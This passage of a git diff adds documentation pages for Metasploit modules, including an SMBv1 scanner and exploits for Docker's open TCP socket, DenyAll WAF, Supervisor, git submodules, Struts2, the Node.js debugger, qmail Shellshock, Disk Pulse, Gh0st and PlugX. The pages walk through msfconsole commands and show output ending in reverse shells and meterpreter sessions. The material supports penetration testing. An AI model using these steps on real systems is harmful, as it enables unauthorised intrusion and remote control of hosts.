- 192.168.45.159:3632 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:5432 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:5900 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:6000 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:6667 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:6697 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:8009 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:8180 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:8787 - TCP OPEN +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +``` diff --git a/documentation/modules/auxiliary/scanner/smb/smb1.md b/documentation/modules/auxiliary/scanner/smb/smb1.md new file mode 100644 index 0000000000..17c30c3a8a --- /dev/null +++ b/documentation/modules/auxiliary/scanner/smb/smb1.md 
@@ -0,0 +1,55 @@ +# Description +This module scans for hosts that support the SMBv1 protocol. It works by sending an SMB_COM_NEGOTATE request to each host specified in RHOSTS and claims that it only supports the following SMB dialects: +```PC NETWORK PROGRAM 1.0 +LANMAN1.0 +Windows for Workgroups 3.1a +LM1.2X002 +LANMAN2.1 +NT LM 0.12 +``` +If the SMB server has SMBv1 enabled it will respond to the request with a dialect selected. +If the SMB server does not support SMBv1 a RST will be sent. + +___ +# Usage + +The following is an example of its usage, where x.x.x.x allows SMBv1 and y.y.y.y does not. + +#### A host that does support SMBv1. + +``` +msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1 +msf auxiliary(smb1) > set RHOSTS x.x.x.x +RHOSTS => x.x.x.x +msf auxiliary(smb1) > run + +[+] x.x.x.x:445 - x.x.x.x supports SMBv1 dialect. +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +msf auxiliary(smb1) > services -S x.x.x.x + +Services +======== + +host port proto name state info +---- ---- ----- ---- ----- ---- +x.x.x.x 445 tcp smb1 open +``` + +#### A host that does not support SMBv1 + +``` +msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1 +msf auxiliary(smb1) > set RHOSTS y.y.y.y +RHOSTS => y.y.y.y +msf auxiliary(smb1) > run + +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +``` +___ + + +## Options + +The only option is RHOSTS, which can be specified as a single IP, hostname, or an IP range in CIDR notation or range notation. It can also be set using hosts from the database using ```hosts -R```. \ No newline at end of file diff --git a/documentation/modules/auxiliary/scanner/ssh/ssh_login.md b/documentation/modules/auxiliary/scanner/ssh/ssh_login.md index 1a1be86f02..e50c0ff6bd 100644 --- a/documentation/modules/auxiliary/scanner/ssh/ssh_login.md +++ b/documentation/modules/auxiliary/scanner/ssh/ssh_login.md 
@@ -14,7 +14,7 @@ 5. Do: `run` 6. You will hopefully see something similar to, followed by a session: - ````[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '``` + ```[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '``` ## Options diff --git a/documentation/modules/exploit/linux/http/centreon_useralias_exec.md b/documentation/modules/exploit/linux/http/centreon_useralias_exec.md index f9452ae0cd..9ac31d1ccc 100644 --- a/documentation/modules/exploit/linux/http/centreon_useralias_exec.md +++ b/documentation/modules/exploit/linux/http/centreon_useralias_exec.md @@ -187,7 +187,7 @@ finish ## Scenarios Just a standard run. - +``` msf > use exploit/linux/http/centreon_useralias_exec msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python payload => cmd/unix/reverse_python diff --git a/documentation/modules/exploit/linux/http/denyall_waf_exec.md b/documentation/modules/exploit/linux/http/denyall_waf_exec.md new file mode 100644 index 0000000000..c41efa6ae1 --- /dev/null +++ b/documentation/modules/exploit/linux/http/denyall_waf_exec.md 
@@ -0,0 +1,47 @@ +## Vulnerable Application + +This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a terminal command under the context of the web server user. + +It's possible to have trial demo for 15 days at Amazon Marketplace. +[https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911](https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911) + +You just need to follow instruction above URL. + +## Verification Steps + +A successful check of the exploit will look like this: + +- [ ] Start `msfconsole` +- [ ] `use use exploit/linux/http/denyall_exec` +- [ ] Set `RHOST` +- [ ] Set `LHOST` +- [ ] Run `check` +- [ ] **Verify** that you are seeing `The target appears to be vulnerable.` +- [ ] Run `exploit` +- [ ] **Verify** that you are seeing `iToken` value extraction. +- [ ] **Verify** that you are getting `meterpreter` session. + +## Scenarios + +``` +msf > use exploit/linux/http/denyall_exec +msf exploit(denyall_exec) > +msf exploit(denyall_exec) > set RHOST 35.176.123.128 +RHOST => 35.176.123.128 +msf exploit(denyall_exec) > set LHOST 35.12.3.3 +LHOST => 35.12.3.3 +msf exploit(denyall_exec) > check +[*] 35.176.123.128:3001 The target appears to be vulnerable. +msf exploit(denyall_exec) > exploit + +[*] Started reverse TCP handler on 35.12.3.3:4444 +[*] Extracting iToken value from unauthenticated accessible endpoint. +[+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a +[*] Trigerring command injection vulnerability with iToken value. +[*] Sending stage (40411 bytes) to 35.176.123.128 +[*] Meterpreter session 1 opened (35.176.123.128:4444 -> 35.12.3.3:60556) at 2017-09-19 14:31:52 +0300 + +meterpreter > pwd +/var/log/denyall/reverseproxy +meterpreter > +``` \ No newline at end of file 
diff --git a/documentation/modules/exploit/linux/http/docker_daemon_tcp.md b/documentation/modules/exploit/linux/http/docker_daemon_tcp.md new file mode 100644 index 0000000000..4c32e54a03 --- /dev/null +++ b/documentation/modules/exploit/linux/http/docker_daemon_tcp.md 
@@ -0,0 +1,131 @@ +# Vulnerable Application +Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp +with tls but without tls-auth), an attacker can create a Docker +container with the '/' path mounted with read/write permissions on the +host server that is running the Docker container. As the Docker +container executes command as uid 0 it is honored by the host operating +system allowing the attacker to edit/create files owned by root. This +exploit abuses this to creates a cron job in the '/etc/cron.d/' path of +the host server. + +The Docker image should exist on the target system or be a valid image +from hub.docker.com. + +## Docker Engine +By default, Docker runs via a non-networked unix socket. It can also +optionally communicate using a tcp socket. + +> Warning: Changing the default docker daemon binding to a TCP port or +Unix docker user group will increase your security risks by allowing +non-root users to gain root access on the host. Make sure you control +access to docker. If you are binding to a TCP port, anyone with access +to that port has full Docker access; so it is not advisable on an open +network. -- [from docs.docker.com][1] + +This module was tested with Debian 9 and CentOS 7 as the host operating +system and with Docker CE 17.06.0-ce and Docker Engine 1.13.1. + +### Install Debian 9 +First [install Debian 9][2] with default task selection. This includes +the "*standard system utilities*". + +### Install Docker +Then install a supported version of [Docker on Debian system][3]. + +```bash +# TL;DR +apt-get remove docker docker-engine +apt-get install apt-transport-https ca-certificates curl gnupg2 software-properties-common +curl -fsSL https://download.docker.com/linux/debian/gpg | apt-key add - +apt-key fingerprint 0EBFCD88 +# Verify that the key ID is 9DC8 5822 9FC7 DD38 854A E2D8 8D81 803C 0EBF CD88. 
+add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/debian $(lsb_release -cs) stable" +apt-get update +apt-get install docker-ce +docker run hello-world +``` + +### Activate unprotected tcp socket +Once Docker is installed, customize the Docker daemon options and add +the tcp socket `-H tcp://0.0.0.0:2375` option. On Debian override the +settings from `/lib/systemd/system/docker.service` with a new file +`/etc/systemd/system/docker.service`. + +Further information: [docker systemd][4] and [docker daemon options][5]. + +```bash +# TL;DR +echo "[Service] +ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375" | tee /etc/systemd/system/docker.service +systemctl daemon-reload +systemctl restart docker +curl http://127.0.0.1:2375/_ping ; echo +OK +``` + +### Mitigation + +[Disable][5] or [protect][6] the Docker tcp socket. + +# Exploitation +This module is designed for the attacker to leverage, creation of a +Docker container with out authentication through the Docker tcp socket +to gain root access to the hosting server of the Docker container. + +## Options +- DOCKERIMAGE is the locally or from hub.docker.com available image you are wanting to have Docker to deploy for this exploit. 
+- CONTAINER_ID if you want to have a human readable name for your container, else it will be randomly generated + +## Steps to exploit with module +- [ ] Start msfconsole +- [ ] use exploit/linux/http/docker_daemon_tcp +- [ ] Set the options appropriately and set VERBOSE to true +- [ ] Verify it creates a Docker container and it successfully runs +- [ ] After a minute a session should be opened from the Docker server + +## Example Output +``` +msf > use exploit/linux/http/docker_daemon_tcp +msf exploit(docker_daemon_tcp) > set RHOST 192.168.66.23 +RHOST => 192.168.66.23 +msf exploit(docker_daemon_tcp) > set PAYLOAD python/meterpreter/reverse_tcp +PAYLOAD => python/meterpreter/reverse_tcp +msf exploit(docker_daemon_tcp) > set LHOST 192.168.66.10 +LHOST => 192.168.66.10 +msf exploit(docker_daemon_tcp) > set VERBOSE true +VERBOSE => true +msf exploit(docker_daemon_tcp) > check +[+] 192.168.66.23:2375 The target is vulnerable. +msf exploit(docker_daemon_tcp) > run + +[*] Started reverse TCP handler on 192.168.66.10:4444 +[*] Check if images exist on the target host +[*] Image is not available on the target host +[*] Trying to pulling image from docker registry, this may take a while +[*] Setting container json request variables +[*] Creating the docker container command +[*] The docker container is created, waiting for deploy +[*] Waiting for the cron job to run, can take up to 60 seconds +[*] Waiting until the docker container stopped +[*] The docker container has been stopped, now trying to remove it +[*] Sending stage (40411 bytes) to 192.168.66.23 +[*] Meterpreter session 1 opened (192.168.66.10:4444 -> 192.168.66.23:35050) at 2017-07-25 14:03:02 +0200 +[+] Deleted /etc/cron.d/lVoepNpy +[+] Deleted /tmp/poasDIuZ + + +meterpreter > sysinfo +Computer : debian +OS : Linux 4.9.0-3-amd64 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) +Architecture : x64 +System Language : en_US +Meterpreter : python/linux +meterpreter > +``` + 
+[1]:https://docs.docker.com/engine/reference/commandline/dockerd/#bind-docker-to-another-hostport-or-a-unix-socket +[2]:https://www.debian.org/releases/stretch/amd64/index.html.en +[3]:https://docs.docker.com/engine/installation/linux/docker-ce/debian/ +[4]:https://docs.docker.com/engine/admin/systemd/ +[5]:https://docs.docker.com/engine/reference/commandline/dockerd/#options +[6]:https://docs.docker.com/engine/security/https/ diff --git a/documentation/modules/exploit/linux/http/logsign_exec.md b/documentation/modules/exploit/linux/http/logsign_exec.md index c875dd0347..177a36b5bb 100644 --- a/documentation/modules/exploit/linux/http/logsign_exec.md +++ b/documentation/modules/exploit/linux/http/logsign_exec.md @@ -56,7 +56,7 @@ dns-nameservers 8.8.8.8 1. Install the software as documented above 2. Start `msfconsole` 3. `use exploit/linux/http/logsign_exec` - 4. `set rhost 12.0.0.10 + 4. `set rhost 12.0.0.10` 6. `python/meterpreter/reverse_tcp` is configured as a default payload. Change it if you need. Most of the case, you're okay go with default payload type. 7. `set LHOST 12.0.0.1` 8. `check` and validate that you are seeing following output. diff --git a/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md b/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md new file mode 100644 index 0000000000..8b63cf55ec --- /dev/null +++ b/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md 
@@ -0,0 +1,78 @@ +## Vulnerable Application + + This module exploits an authenticated RCE vulnerability in Supervisor versions 3.0a1 to 3.3.2 + + This has been tested with versions 3.2.0 and 3.3.2 + +### Creating A Testing Environment + + At the time of writing, version 3.2.0-2ubuntu0.1 is available in the Ubuntu repositories. + + 1. ```sudo apt-get install supervisor``` + 2. Enable Web interface/XML-RPC server in Supervisor config in `/etc/supervisor/supervisord.conf` + + ``` + [inet_http_server] ; inet (TCP) server disabled by default + port=:9001 ; ip_address:port specifier, *:port for all iface + username=user ; default is no username (open server) + password=123 ; default is no password (open server) + ``` + + 3. Restart the service: `sudo service supervisor restart` + +## Verification Steps + + 1. ```use exploit/linux/http/supervisor_xmlrpc_exec``` + 2. ```set lhost [IP]``` + 3. ```set rhost [IP]``` + 4. ```set httpusername user``` + 5. ```set httppassword 123``` + 6. ```exploit``` + 7. A meterpreter session should have been opened successfully + +## Options + + **HttpUsername** + + Username for HTTP basic auth which is set in the conf file(optional) + + **HttpPassword** + + Password for HTTP basic auth which is set in the conf file(optional) + + **TARGETURI** + + The path to the XML-RPC endpoint + +## Scenarios + +### Supervisor 3.2.0 on Xubuntu 16.04 + +``` +msf > use exploit/linux/http/supervisor_xmlrpc_exec +msf exploit(supervisor_xmlrpc_exec) > set httpusername user +httpusername => user +msf exploit(supervisor_xmlrpc_exec) > set httppassword 123 +httppassword => 123 +msf exploit(supervisor_xmlrpc_exec) > set lhost 192.168.0.2 +lhost => 192.168.0.2 +msf exploit(supervisor_xmlrpc_exec) > set rhost 192.168.0.19 +rhost => 192.168.0.19 +msf exploit(supervisor_xmlrpc_exec) > check + +[*] Extracting version from web interface.. +[*] Using basic auth (user:123) +[+] Vulnerable version found: 3.2.0 +[*] 192.168.0.19:9001 The target appears to be vulnerable. 
+msf exploit(supervisor_xmlrpc_exec) > exploit + +[*] Started reverse TCP handler on 192.168.0.2:4444 +[*] Sending XML-RPC payload via POST to 192.168.0.19:9001/RPC2 +[*] Using basic auth (user:123) +[*] Sending stage (2878872 bytes) to 192.168.0.19 +[*] Command Stager progress - 100.00% done (782/782 bytes) +[+] Request timeout, usually indicates success. Passing to handler.. +[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.19:36186) at 2017-08-30 01:24:45 +0100 + +meterpreter > +``` diff --git a/documentation/modules/exploit/multi/http/git_submodule_command_exec.md b/documentation/modules/exploit/multi/http/git_submodule_command_exec.md new file mode 100644 index 0000000000..bb119f36cb --- /dev/null +++ b/documentation/modules/exploit/multi/http/git_submodule_command_exec.md 
@@ -0,0 +1,62 @@ +## Vulnerable Application + + Git can be installed on a variety of operating systems, however + newer versions may contain the patch for this vulnerability. + + On OSX it can be installed with the XCode command line tools: + ```xcode-select --install``` + + On Linux it can be installed with apt: + ```sudo apt-get update && sudo apt-get install git``` + + You can check the version with ```git --version```. + The fix is included in the following version: + 2.7.6, 2.8.6, 2.9.5, 2.10.4, 2.11.3, 2.12.4, 2.13.5, 2.14.1 + +## Verification Steps + + Example steps in this format: + + 1. Install the application + 1. Start msfconsole + 1. Do: ```use exploit/multi/http/git_submodule_command_exec``` + 1. Do: ```set SRVHOST [local host]``` + 1. Do: ```set LHOST [local host]``` + 1. Do: ```exploit``` + 1. Clone the malicious Git URI and its submodules + 1. You should get a shell + +## Options + + **GIT_URI** + + This is the URI the git repository will be hosted from (defaults to random). + + **GIT_SUBMODULE** + + This is the URI of the submodule within the git repository (defaults to random). + The url of this submodule, when cloned, will execute the payload. + +## Scenarios + + Example usage against a macOS Sierra x64 bit target running git version 2.10.1 + +``` +msf > use exploit/multi/http/git_submodule_command_exec +msf exploit(git_submodule_command_exec) > set SRVHOST 192.168.0.1 +SRVHOST => 192.168.0.1 +msf exploit(git_submodule_command_exec) > set LHOST 192.168.0.1 +LHOST => 192.168.0.1 +msf exploit(git_submodule_command_exec) > exploit +[*] Exploit running as background job. + +[*] Started reverse TCP handler on 192.168.0.1:4444 +msf exploit(git_submodule_command_exec) > [*] Using URL: http://192.168.0.1:8080/D29MF1UC +[*] Server started. 
+[*] Malicious Git URI is http://192.168.0.1:8080/ldnwrixuqq.git +*** +Victim executes: git clone http://192.168.0.1:8080/ldnwrixuqq.git --recurse-submodules +*** +[*] Command shell session 1 opened (192.168.0.1:4444 -> 192.168.0.1:55151) at 2017-08-29 16:54:56 +0800 +[*] Command shell session 2 opened (192.168.0.1:4444 -> 192.168.0.1:55152) at 2017-08-29 16:54:56 +0800 +``` diff --git a/documentation/modules/exploit/multi/http/struts2_rest_xstream.md b/documentation/modules/exploit/multi/http/struts2_rest_xstream.md new file mode 100644 index 0000000000..97f7785086 --- /dev/null +++ b/documentation/modules/exploit/multi/http/struts2_rest_xstream.md 
@@ -0,0 +1,47 @@ +`struts2_rest_xstream` is a module that exploits Apache Struts 2's REST plugin, using the XStream handler to deserialise XML requests perform arbitrary code execution. + +## Vulnerable Application + +Apache Struts versions 2.1.2 - 2.3.33 and Struts 2.5 - Struts 2.5.12 + +You can download these versions here with any version of Apache Tomcat: + +http://archive.apache.org/dist/struts/ + +You will also need to install a Struts 2 showcase application, which can be found here: + +https://mvnrepository.com/artifact/org.apache.struts/struts2-rest-showcase + +## Options + +**TARGETURI** + +The path to a struts application action + +**VHOST** + +The HTTP server virtual host. You will probably need to configure this as well, even though it is set as optional. + +## Demonstration + +**The Check Command** + +The `struts2_rest_xstream` module comes with a check command that can effectively check if the remote host is vulnerable or not. To use this, configure the msfconsole similar to the following: + +``` +set VERBOSE true +set RHOST [IP] +set TARGETURI [path to the Struts app with an action] +``` + +When the module is in verbose mode, the `check` command will try to tell you the OS information, and whether or not the machine is vulnerable. Like this: + +``` +msf exploit(struts2_rest_xstream) > check + +[+] 10.1.11.11:8080 The target appears to be vulnerable. +``` + +**Exploiting the Host** + +After identifying the vulnerability on the target machine, you can try to exploit it. Be sure to set TARGETURI to the correct URI for your application, and the TARGET variable for the appropriate host OS. diff --git a/documentation/modules/exploit/multi/misc/nodejs_v8_debugger.md b/documentation/modules/exploit/multi/misc/nodejs_v8_debugger.md new file mode 100644 index 0000000000..1d699fd6b9 --- /dev/null +++ b/documentation/modules/exploit/multi/misc/nodejs_v8_debugger.md 
@@ -0,0 +1,64 @@ +## Vulnerable Application + +Current and historical versions of node (or any JS env based on the +V8 JS engine) have this functionality and could be exploitable if +configured to expose the JS port on an untrusted interface. + +Install a version of node using any of the normal methods: +* Vendor: https://nodejs.org/en/download/package-manager/ +* Distro: `sudo apt-get install nodejs` + +Alternately, use standard node docker containers as targets: +``` +$ docker run -it --rm -p 5858:5858 node:4-wheezy node --debug=0.0.0.0:5858 +``` +(Others at https://hub.docker.com/_/node/) + +Tested on Node 7.x, 6.x, 4.x + +## Verification Steps + +1. Run a node process exposing the debug port +``` +node --debug=0.0.0.0:5858 +``` + +2. Exploit it and catch the callback: + +``` +msfconsole -x "use exploit/multi/misc/nodejs_v8_debugger; set RHOST 127.0.0.1; set PAYLOAD nodejs/shell_reverse_tcp; set LHOST 127.0.0.1; handler -H 0.0.0.0 -P 4444 -p nodejs/shell_reverse_tcp; exploit +``` +(If using docker hosts as targets for testing, ensure that LHOST addr is accessible to the container) + +Note that in older Node versions (notably 4.8.4), the debugger will not immediately process the incoming eval message. As soon as there is some kind of activity +(such as a step or continue in the debugger, or just hitting enter), the payload will execute and the handler session will start. + + +## Scenarios + +### Example Run (Node 7.x) + +Victim: +``` +$ node --version +v7.10.0 +$ node --debug=0.0.0.0:5858 +(node:83089) DeprecationWarning: node --debug is deprecated. Please use node --inspect instead. +Debugger listening on 0.0.0.0:5858 +> +(To exit, press ^C again or type .exit) +``` + +Attacker: +``` +msf exploit(nodejs_v8_debugger) > exploit + +[*] Started reverse TCP handler on 10.0.0.141:4444 +[*] 127.0.0.1:5858 - Sending 745 byte payload... 
+[*] 127.0.0.1:5858 - Got success response +[*] Command shell session 4 opened (10.0.0.141:4444 -> 10.0.0.141:53168) at 2017-09-04 00:37:17 -0700 + +id +(redacted) +``` + diff --git a/documentation/modules/exploit/unix/smtp/qmail_bash_env_exec.md b/documentation/modules/exploit/unix/smtp/qmail_bash_env_exec.md new file mode 100644 index 0000000000..167ef65cdd --- /dev/null +++ b/documentation/modules/exploit/unix/smtp/qmail_bash_env_exec.md 
@@ -0,0 +1,82 @@ +## Vulnerable Application + +Any qmail version (works on latest versions, qmail-1.03 and netqmail-1.06) running on a system with a vulnerable BASH (Shellshock). In order to execute code, /bin/sh has to be linked to bash (usually default configuration) and a valid recipient must be set on the RCPT TO field (usually admin@exampledomain.com). The exploit does not work on the "qmailrocks" community version as it ensures the MAILFROM field is well-formed. + +## Setting up a vulnerable environment + +Install Qmail on a Linux server with a shellshock vulnerable bash. Ensure that /bin/sh is linked to bash. Create an e-mail account on that qmail server. IMPORTANT: there is a community version of qmail, "qmailrocks" (http://qmailrocks.thibs.com/) which apply a patch that checks the vulnerable MAILFROM parameter. This version (with the patch applied) is NOT vulnerable. If you are using this version, change the "int mfcheck()" function on qmail-smtpd.c and ensure it returns always 0 (after applying the patch) and re-compile qmail-smtpd. + +## Verification Steps + + 1. `use exploit/unix/smtp/qmail_bash_env_exec` + 2. `set RHOST ` + 3. `set MAILTO ` + 4. `set payload cmd/unix/reverse` + 5. `set LHOST ` + 7. optionally set `RPORT` and `LPORT` + 8. `exploit` + 9. **Verify** a new shell session is started + +## Options + +**MAILTO** + +A valid e-mail recipient. Usually, admin@targetdomain.com can be used. + +## Sample Output +**Tested on qmail-1.03 on Debian 6.0.6 (squeeze). 
BASH version 4.1.5(1).** + +``` +msf > use exploit/unix/smtp/qmail_bash_env_exec +msf exploit(qmail_bash_env_exec) > set rhost 192.168.1.113 +rhost => 192.168.1.113 +msf exploit(qmail_bash_env_exec) > set mailto "admin@testqmail2.test" +mailto => admin@testqmail2.test +msf exploit(qmail_bash_env_exec) > set payload cmd/unix/reverse +payload => cmd/unix/reverse +msf exploit(qmail_bash_env_exec) > show options + +Module options (exploit/unix/smtp/qmail_bash_env_exec): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + MAILTO admin@testqmail2.test yes TO address of the e-mail + RHOST 192.168.1.113 yes The target address + RPORT 25 yes The target port (TCP) + + +Payload options (cmd/unix/reverse): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST 192.168.1.102 yes The listen address + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Automatic + + +msf exploit(qmail_bash_env_exec) > run + +[*] Started reverse TCP double handler on 192.168.1.102:4444 +[*] 192.168.1.113:25 - Sending the payload... +[*] 192.168.1.113:25 - Sending RCPT TO admin@testqmail2.test +[*] Accepted the first client connection... +[*] Accepted the second client connection... +[*] Command: echo RvZfov9i2ZuveLXA; +[*] Writing to socket A +[*] Writing to socket B +[*] Reading from sockets... +[*] Reading from socket B +[*] B: "RvZfov9i2ZuveLXA\r\n" +[*] Matching... +[*] A is input... +[*] Command shell session 19 opened (192.168.1.102:4444 -> 192.168.1.113:48167) at 2017-05-04 15:11:02 +0200 + +whoami +vpopmail +``` diff --git a/documentation/modules/exploit/windows/browser/firefox_smil_uaf.md b/documentation/modules/exploit/windows/browser/firefox_smil_uaf.md index f6e7c223b9..106d1f24a5 100644 --- a/documentation/modules/exploit/windows/browser/firefox_smil_uaf.md +++ b/documentation/modules/exploit/windows/browser/firefox_smil_uaf.md 
@@ -17,7 +17,7 @@ The module includes an option named UsePostHTML which is turned off by default. 1. Start msfconsole 2. Do: ```use exploit/windows/browser/firefox_smil_uaf``` -3. Do: ```set payload [PREFERRED PAYLOAD] +3. Do: ```set payload [PREFERRED PAYLOAD]``` 4. Do: ```set PAYLOAD [PAYLOAD NAME]``` 5. Set payload options as needed 6. Do: ```run```, and have a target browse to the generated URL diff --git a/documentation/modules/exploit/windows/http/disk_pulse_enterprise_get.md b/documentation/modules/exploit/windows/http/disk_pulse_enterprise_get.md new file mode 100644 index 0000000000..13db863e7d --- /dev/null +++ b/documentation/modules/exploit/windows/http/disk_pulse_enterprise_get.md 
@@ -0,0 +1,55 @@ +## Vulnerable Application + + Tested on Windows 7 x64 and x86. + + Install the application from the link below and enable the web server by going to Options -> Server -> Enable Web Server on Port. + + [Disk Pulse Enterprise v 9.9.16](https://www.exploit-db.com/apps/45ce22525c87c0762f6e467db6ddfcbc-diskpulseent_setup_v9.9.16.exe) + +## Verification Steps + + 1. Install the application and set the option above to enable the web server + 2. Start msfconsole + 3. Do: ```use exploit/windows/http/disk_pulse_enterprise_get``` + 5. Set options and payload + 6. Do: ```run``` + 7. You should get a shell. + +## Options + + **RHOST** + + IP address of the remote host running the server. + + **RPORT** + + Port that the web server is running on. Default is 80 but it can be changed when setting up the program or in the options. + +## Scenarios + + To obtain a shell: + + ``` +msf > use exploit/windows/http/disk_pulse_enterprise_get +msf exploit(disk_pulse_enterprise_get) > set payload windows/shell_reverse_tcp +payload => windows/shell_reverse_tcp +msf exploit(disk_pulse_enterprise_get) > set RHOST x.x.x.x +RHOST => x.x.x.x +msf exploit(disk_pulse_enterprise_get) > set LHOST y.y.y.y +LHOST => y.y.y.y +msf exploit(disk_pulse_enterprise_get) > set LPORT 1234 +LPORT => 1234 +msf exploit(disk_pulse_enterprise_get) > set RPORT 8080 +RPORT => 8080 +msf exploit(disk_pulse_enterprise_get) > exploit + +[*] Started reverse TCP handler on y.y.y.y:1234 +[*] Generating exploit... +[*] Sending exploit... +[*] Command shell session 1 opened (y.y.y.y:1234 -> x.x.x.x:64567) at 2017-09-14 10:52:06 -0500 + +Microsoft Windows [Version 6.1.7600] +Copyright (c) 2009 Microsoft Corporation. All rights reserved. + +C:\Windows\system32> + ``` \ No newline at end of file diff --git a/documentation/modules/exploit/windows/misc/gh0st.md b/documentation/modules/exploit/windows/misc/gh0st.md new file mode 100644 index 0000000000..5ae7c251e4 --- /dev/null 
+++ b/documentation/modules/exploit/windows/misc/gh0st.md @@ -0,0 +1,42 @@ +## Vulnerable Application + + This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim. + This vulnerability can allow remote code execution in the context of the user who ran it. + + A vulnerable version of the software is available here: [gh0st 3.6](https://github.com/rapid7/metasploit-framework/files/1243297/0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c.zip) + +## Verification Steps + + 1. Run the application + 2. Start msfconsole + 3. Do: `use exploit/windows/misc/gh0st` + 4. Do: `set rhost [ip]` + 5. Do: `exploit` + 6. Get a shell + +## Options + + **MAGIC** + + This is the 5 character magic used by the server. The default is `Gh0st` + +## Scenarios + +### Windows XP SP3 with gh0st 3.6 + +``` +msf > use exploit/windows/misc/gh0st +msf exploit(gh0st) > set rhost 192.168.2.108 +rhost => 192.168.2.108 +msf exploit(gh0st) > exploit + +[*] Started reverse TCP handler on 1.2.3.4:4444 +[*] 1.2.3.1:80 - Trying target Gh0st Beta 3.6 +[*] 1.2.3.1.108:80 - Spraying heap... +[*] 1.2.3.1:80 - Trying command 103... +[*] Sending stage (956991 bytes) to 1.2.3.1 +[*] Meterpreter session 1 opened (1.2.3.4:4444 -> 1.2.3.1:1303) at 2017-08-26 16:53:58 -0400 +[*] 1.2.3.1:80 - Server closed connection + +meterpreter > +``` diff --git a/documentation/modules/exploit/windows/misc/plugx.md b/documentation/modules/exploit/windows/misc/plugx.md new file mode 100644 index 0000000000..63640995f3 --- /dev/null +++ b/documentation/modules/exploit/windows/misc/plugx.md 
@@ -0,0 +1,42 @@ +## Vulnerable Application + + This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message. + This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained. + + A vulnerable version of the software is available here: [PlugX type 1](https://github.com/rapid7/metasploit-framework/files/1243293/9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6.zip) + +## Verification + + 1. Run the application + 2. Start msfconsole + 3. Do: `use exploit/windows/misc/plugx` + 4. Do: `set rhost [ip]` + 5. Do: `set target [target]` + 6. Do: `exploit` + 7. Click OK for the "PeDecodePacket" pop-up on the target + 8. Get a shell + +## Scenarios + +### Windows XP SP3 with PlugX type 1 + +``` +msf > use exploit/windows/misc/plugx +msf exploit(plugx) > set rhost 1.2.3.4 +rhost => 1.2.3.4 +msf exploit(plugx) > set target 1 +target => 1 +msf exploit(plugx) > set verbose true +verbose => true +msf exploit(plugx) > exploit + +[*] Started reverse TCP handler on 1.2.3.99:4444 +[*] 1.2.3.4:13579 - Trying target PlugX Type I... +[*] 1.2.3.4:13579 - waiting for response +[*] Sending stage (956991 bytes) to 1.2.3.4 +[*] Meterpreter session 1 opened (1.2.3.99:4444 -> 1.2.3.4:1975) at 2017-09-04 19:53:07 -0400 +[*] 1.2.3.4:13579 - Server closed connection + +meterpreter > getuid +Server username: WINXP\user +``` diff --git a/documentation/modules/post/hardware/automotive/getvinfo.md b/documentation/modules/post/hardware/automotive/getvinfo.md index ed9fc984c7..4af4e47892 100644 --- a/documentation/modules/post/hardware/automotive/getvinfo.md +++ b/documentation/modules/post/hardware/automotive/getvinfo.md 
@@ -30,6 +30,10 @@ PIDs to ASCII. Optional byte-value to use for padding all CAN bus packets to an 8-byte length. Padding is disabled by default. + **FC** + + Optional. If true forces sending flow control packets on all multibyte ISO-TP requests + ## Scenarios Given a standard vehicle ECU that is connected to can2 of the HWBridge device: diff --git a/documentation/modules/post/multi/gather/maven_creds.md b/documentation/modules/post/multi/gather/maven_creds.md new file mode 100644 index 0000000000..3c7235021d --- /dev/null +++ b/documentation/modules/post/multi/gather/maven_creds.md 
